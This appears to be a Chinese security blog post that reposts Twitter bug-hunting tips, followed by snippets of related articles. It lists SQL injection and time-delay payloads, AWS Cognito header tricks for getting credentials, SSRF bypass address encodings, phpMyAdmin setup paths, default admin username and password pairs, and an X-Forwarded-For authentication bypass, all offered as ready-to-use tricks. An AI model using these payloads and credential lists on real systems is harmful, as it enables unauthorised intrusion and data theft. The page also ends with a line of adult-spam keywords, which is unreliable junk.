<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    干貨 | Twitter滲透技巧搬運工

    VSole2022-08-16 06:46:31

    快速檢測有無SQL注入

    ' OR 1=1--
    ' OR 1=0--
    %27%20or%201=1
    *(|(object=*))
    )%20or%20('x'='x
    %20or%201=1
    1) or pg_sleep(__TIME__)--
    /**/or/**/1/**/=1
    ' or username like '%
    );waitfor delay '0:0:__TIME__'--
    or isNULL(1/0) /*
    x' or 1=1 or 'x'='y
    

    來源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

    AWS Cognito 配置錯誤

    X-AMZ-Target:AWSCognitoIdentityProviderService.ConfirmSignUp
    X-AMZ-Target:AWSCognitoIdentityProviderService.GetUser
    獲取憑證訪問密鑰 ID 和密鑰 將標頭更改為這樣并觀察響應
    X-AMZ-TARGET:AWSCognitoIdentityService.GetCredentialsForIdentity
    

    來源:

    https://threadreaderapp.com/thread/1522086964262051841.html

    SSRF Bypass技巧

    SSRF Bypasses
    http://0.0.0.0
    http://0
    http://0x7f000001
    http://2130706433
    http://0000::1
    http://0000::1:25
    http://0000::1:22
    http://0000::1:3128
    http://2130706433
    http://3232235521
    http://3232235777
    http://2852039166
    http://0o177.0.0.1
    

    來源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

    PHPMyadmin滲透技巧

    當默認憑據在#phpmyadmin登錄時不起作用時,我會嘗試訪問這些路徑
    admin/phpMyAdmin/setup/index.php
    phpMyAdmin/main.php
    phpmyadmin/pma/
    Admin/setup/index.php
    phpmyadmin/admin/setup/index.php
    phpmyadmin/setup/
    phpmyadmin/setup/index.php
    

    來源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q

    找到管理員登錄口,可以嘗試以下賬號密碼

    admin:admin
    admin:a
    admin:12346578
    test:test
    guest:guest
    anonymous:anonymous
    admin:password
    admin:
    root:toor
    root:passw0rd
    root:root
    guest:test
    $sub_name:password
    ADMIN:ADMIN
    Admin:Admin
    :
    a:a
    

    來源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA

    漏洞挖掘小技巧-身份繞過小技巧,修改XFF頭

    Authentication bypass.... 
    Using custom header (See attached screenshot):
    X-Forwarded-For: 127.0.0.1
    

    httpsadmin
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    dnslog.link,命令執行漏洞的時候搞起ls命令記錄起來很利索,比dnslog.cn快
    近日,谷歌正在測試一項新功能,以防止惡意公共網站通過用戶瀏覽器攻擊內部專用網絡上的設備和服務。新版本將能夠檢測并阻止惡意分子通過網絡釣魚等手段試圖控制用戶局域網內其他設備的行為。
    域滲透歷史漏洞匯總
    2022-04-14 06:58:32
    MS14-068(CVE-2014-6324) Kerberos 校驗和漏洞 https://nvd.nist.gov/vuln/detail/CVE-2014-6324 EXP/POC: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
    虛機ubuntu20.04, 安裝docker, sudo apt install docker.io, sudo systemctl enable docker, sudo gpasswd -a ubuntu docker, newgrp docker, 安裝docker-compose, sudo apt install docker-compose, 給harbor起個本地域
    域滲透重要漏洞匯總
    uDork并不會對任何服務器執行攻擊行為,它只會使用預定義的Dork或exploit-db.com提供的官方列表來進行搜索和查詢。Google Hacking是使用搜索引擎,比如谷歌來定位因特網上的安全隱患和易攻擊點。谷歌對于第一種攻擊者來說用處很少,但是對于第二種攻擊者則發揮了重要作用。掃描器是自動開始一個檢查系統的絕大部分地方的過程,以便發現安全缺陷的這樣一個程序。
    harbor2.5版本開始支持cosign做鏡像簽名,本周實踐了一下, ubuntu20.04.4,安裝docker,sudo apt install docker.io, sudo systemctl enable docker, sudo gpasswd -a ubuntu docker, newgrp docker, 安裝docker-compose,sudo apt instal
    這篇文章主要收集一些常見的未授權訪問漏洞。未授權訪問漏洞可以理解為需要安全配置或權限認證的地址、授權頁面存在缺陷導致其他用戶可以直接訪問從而引發重要權限可被操作、數據庫或網站目錄等敏感信息泄露。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类